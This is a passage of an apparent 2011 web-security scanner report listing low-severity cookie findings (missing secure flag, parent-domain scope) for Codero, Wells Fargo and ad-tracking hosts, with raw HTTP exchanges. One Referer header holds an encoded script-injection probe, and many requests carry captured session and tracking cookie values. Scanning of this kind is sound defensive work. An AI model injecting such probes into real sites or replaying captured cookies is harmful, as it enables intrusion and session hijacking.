Set-Cookie: orderformv1=9p25frmj6slceji5v0d7oe4u42; path=/; HttpOnly
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 17822
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--Header Start-->
   <m
...[SNIP]...

12.4. https://secure.codero.com/order/v/viewcart  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /order/v/viewcart

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /order/v/viewcart HTTP/1.1
Host: secure.codero.com
Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1822897535.1311040801.1311040801.1311040801.1; __utmb=1.1.10.1311040801; __utmc=1; __utmz=1.1311040801.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2021343739-1311040801254; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1311037236103:ss=1311037201593

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 02:00:31 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Set-Cookie: orderformv1=18k58u5m0a4m00pq2k0dqf1ou3; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: orderformv1=9p25frmj6slceji5v0d7oe4u42; path=/; HttpOnly
Location: /order/v/shop?cart=empty
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


12.5. https://secure.codero.com/vpublic/js/orderform-ws.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /vpublic/js/orderform-ws.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vpublic/js/orderform-ws.php?cmd=GetOrderItemCount HTTP/1.1
Host: secure.codero.com
Connection: keep-alive
Referer: http://www.codero.com/images106c4%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E1ca562d2af6/design/banner_certified-expertise.png?time=1308058010
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1822897535.1311040801.1311040801.1311040801.1; __utmb=1.1.10.1311040801; __utmc=1; __utmz=1.1311040801.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2021343739-1311040801254; orderformv1=9p25frmj6slceji5v0d7oe4u42; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1311037244928:ss=1311037201593; UBERSID=rfugnf2bmkoul17ds1inessum5

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:35 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: UBERSID=rfugnf2bmkoul17ds1inessum5; path=/; HttpOnly
Set-Cookie: orderformv1=9p25frmj6slceji5v0d7oe4u42; path=/; HttpOnly
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

cartqty = {"item_count":0,"status":"success"}

12.6. https://www.wellsfargo.com/tas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
Content-Length: 384
Origin: https://www.wellsfargo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

ids=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECONDARY_C_BNR&displayed=CHPPB_HomepagePrimary_mtg_t1govrefidmiweharr1,CHPSBA_HomepageSecondary_chk_packagesp3,
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:41:03 GMT
Content-type: text/html
Set-cookie: TCID=0007b089-750d-8c50-be96-e99900000049;Domain=.wellsfargo.com;Expires=Thu, 18-Jul-2013 09:41:03 GMT;Path=/
Set-cookie: NSC_XfmmtGbshp4=445b32067863;Domain=.wellsfargo.com;Expires=Tue, 19-Jul-2011 13:41:03 GMT;Path=/
Content-Length: 0


13. Cookie scoped to parent domain  previous  next
There are 28 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


13.1. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035874&rn=735981431&c7=http%3A%2F%2Fwww.healthcentral.com%2Fadhd%2Fcf%2Fslideshows%2Fcommon-symptoms-of-add-and-adhd-in-women%2Fhypersensitivity-to-noise-touch-smell%2F%3Fap%3D825&c8=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20-%20ADH&c9=http%3A%2F%2Fpaid.outbrain.com%2Fnetwork%2Fredir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 19 Jul 2011 01:58:26 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 18-Jul-2013 01:58:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.2. http://c.atdmt.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074&RedC=c.bing.com&MXFR=1A2694B1632F60E708B59685672F60DA HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: c.atdmt.com

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.bing.com/c.gif?DI=15074&MUID=39AE9E99C74F6BF03BB69CADC34F6B13&cb=1cc460cb9062000
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=39AE9E99C74F6BF03BB69CADC34F6B13; domain=.atdmt.com; expires=Sat, 04-Feb-2012 12:09:34 GMT; path=/;
Date: Tue, 19 Jul 2011 12:09:34 GMT
Content-Length: 0


13.3. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: c.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=20C55B5B3C8E668525A1596F388E6676
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=20C55B5B3C8E668525A1596F388E6676&TUID=1; domain=.bing.com; expires=Sat, 04-Feb-2012 12:09:33 GMT; path=/;
Date: Tue, 19 Jul 2011 12:09:32 GMT
Content-Length: 0


13.4. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.healthcentral.com%2Fadhd%2Fcf%2Fslideshows%2Fcommon-symptoms-of-add-and-adhd-in-women%2Fhypersensitivity-to-noise-touch-smell%2F%3Fap%3D825&settings=true&recs=true&widgetJSId=AR_2&key=AYQHSUWJ8576&idx=0&version=40317&ref=http%3A%2F%2Fpaid.outbrain.com%2Fnetwork%2Fredir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&apv=false&rand=0.27036919072270393&sig=yiATPu1V HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="f/caN6PzBMk1F/lAXdWPeAONbvolwvwaGjSnoNU+2VO5SAU8hYi/29wx8t2EuHl8OSTmulhXsyCI4REknst1vwJvLAxo68T3J3ha2ARMD8w4gGNnxHK/u2EjsFbY+Vb7l0R/+1aTyjM="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1311040702757; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:22 GMT; Path=/
Set-Cookie: _lvd2="mPJshv1MhYq1peurTu/velXty3gxO0dAK4DoJEN0VUFQbO5UBgsqPVz1xfQCga1ux7y4+04dhUgLhsPAmU3vmR1v80Y9KizJsnotn6N6rbe6dmdB0YKlHmEjsFbY+Vb7SLmJfD9afX4="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 25-Jul-2011 14:46:22 GMT; Path=/
Set-Cookie: _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:22 GMT; Path=/
Set-Cookie: recs-e12d2d49134d4a5a55456c7e33d8990d="YGLIWLSCU9zh36cDmh3P3l85RKZEnC7kKxkoX5M8pN/WSlRYwycmulhMaFxig1+H"; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Tue, 19-Jul-2011 02:03:22 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 01:58:22 GMT
Content-Length: 2687

outbrain_rater.returnedOdbData({'response':{'exec_time':10,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'211901593','req_id':'36fb7aed35f919c0d97b40044959a4c2'},'score':{'preferred
...[SNIP]...

13.5. https://online.wellsfargo.com/das/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/signon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /das/signon HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/das/channel/enrollDisplay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS; BRAND_COOKIE=COB

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:50:06 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN=source=alternate; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

13.6. https://online.wellsfargo.com/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signon?LOB=CONS HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/locator/atm/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN= LOB=CONS; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

13.7. http://paid.outbrain.com/network/redir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://paid.outbrain.com
Path:   /network/redir

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6 HTTP/1.1
Host: paid.outbrain.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="f/caN6PzBMk1F/lAXdWPeAONbvolwvwaGjSnoNU+2VO5SAU8hYi/29wx8t2EuHl8OSTmulhXsyCI4REknst1vwJvLAxo68T3J3ha2ARMD8w4gGNnxHK/u2EjsFbY+Vb7l0R/+1aTyjM="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:19 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Content-Length: 436
Date: Tue, 19 Jul 2011 01:58:18 GMT

<html>
   <body onload="document.location.replace('http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825')">
       <form meth
...[SNIP]...

13.8. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15482;CRE=42330443;PLA=58217920;ADI=240048897; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: spass=639dc8c25a6771ff844957f2a2748213; G12546=C1S98727-3-0-0-0-1311017115-2; G15482=C1S103937-42-0-0-0-1311016999-308

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15482=C1S103937-44-0-0-0-1311016999-23706; path=/; domain=.suitesmart.com; expires=Sun, 15-Jan-2012 01:58:25 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 19 Jul 2011 01:58:25 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

13.9. http://server.iad.liveperson.net/hc/3194108/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/3194108/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/3194108/?&site=3194108&cmd=mTagInPage&lpCallId=726132489740-21619860781&protV=20&lpjson=1&page=http%3A//www.codero.com/&id=4111753688&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&PV%21visitorActive=0 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5314624600296146657; LivePersonID=-16101514677756-1311040810:-1:-1:-1:-1; HumanClickSiteContainerID_3194108=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1311040808225

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:02:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_3194108=STANDALONE; path=/hc/3194108
Set-Cookie: LivePersonID=-16101514677756-1311040810:-1:-1:-1:-1; expires=Wed, 18-Jul-2012 02:02:49 GMT; path=/hc/3194108; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Jul 2011 02:02:49 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"726132489740-21619860781","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-30", "js_code": "lpMTag.lpInPageRequestDelay=30;"}]}});

13.10. https://wellsoffice.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

